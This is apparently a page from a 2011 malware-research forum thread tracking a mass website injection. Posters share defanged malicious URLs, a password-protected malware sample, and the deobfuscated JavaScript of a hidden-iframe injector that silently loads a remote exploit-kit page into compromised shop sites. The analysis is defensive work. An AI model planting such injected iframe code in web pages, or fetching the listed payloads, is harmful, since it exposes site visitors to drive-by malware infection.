willysy.com Mass Injection ongoing - Page 2

Re: willysy.com Mass Injection ongoing

#7797 by Xylitol
Sun Jul 31, 2011 9:42 am

I've found a related malware
hxxp://b48.4dq.com/d/r.exe

it drop hack tool and start it

Attachments

r.exe.zip

pwd: xylibox
(561.53 KiB) Downloaded 63 times

Registration Problems and FAQ - Rules For Malware Requests

Username

Xylitol

Rank

Global Moderator

Posts

1706

Joined

Sat Apr 10, 2010 5:54 pm

Location

Seireitei, Soul Society

Contact

Re: willysy.com Mass Injection ongoing

#7979 by markusg
Sat Aug 13, 2011 1:54 pm

looks like they have new injected:
script src=http://adorabletots.co.uk/tmp/js.php
found this in an shop im watching. at the beginning it was infected with the stuff we talked at the beginning, now it is this.
google search brings 370 results at this moment.

Username

markusg

Posts

737

Joined

Mon Mar 15, 2010 2:53 pm

Re: willysy.com Mass Injection ongoing

#7980 by EP_X0FF
Sat Aug 13, 2011 2:11 pm

markusg wrote:looks like they have new injected:
script src=http://adorabletots.co.uk/tmp/js.php
found this in an shop im watching. at the beginning it was infected with the stuff we talked at the beginning, now it is this.
google search brings 370 results at this moment.

Well, there also obfuscated iframe, but hxxp://solnechnozdes.ru/iframe.php?id=0xxnnc3e8793z0nevu1f4o36ncdvg34 is down for me.
Likely another Blackhole.

[syntax="javascript"]if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='hxxp://solnechnozdes.ru/iframe.php?id=0xxnnc3e8793z0nevu1f4o36ncdvg34' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'hxxp://solnechnozdes.ru/iframe.php?id=0xxnnc3e8793z0nevu1f4o36ncdvg34');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}[/syntax]

Ring0 - the source of inspiration

Username

EP_X0FF

Rank

Global Moderator

Posts

4947

Joined

Sun Mar 07, 2010 5:35 am

Location

Russian Federation

Contact

Re: willysy.com Mass Injection ongoing

#8057 by markusg
Tue Aug 16, 2011 4:24 pm

what about this:

Code: Select all

http://lamacom.net/images/j/

Code: Select all

http://www.nordic-austria.at/shop/index.php

Username

markusg

Posts

737

Joined

Mon Mar 15, 2010 2:53 pm

Re: willysy.com Mass Injection ongoing

#8060 by EP_X0FF
Tue Aug 16, 2011 10:26 pm

markusg wrote:what about this:
Code: Select all
http://lamacom.net/images/j/

obfuscated iframe

[syntax="javascript"]if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'hxxp://mariko10.in/iframe.php?id=0xxnnc3e8793z0nevu1f4o36ncdvg34');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}[/syntax]

Currently hxxp://mariko10.in/iframe.php?id=0xxnnc3e8793z0nevu1f4o36ncdvg34 for me leads to nothing. Likely target is Blackhole probably with SpyEye.

Ring0 - the source of inspiration

Username

EP_X0FF

Rank

Global Moderator

Posts

4947

Joined

Sun Mar 07, 2010 5:35 am

Location

Russian Federation

Contact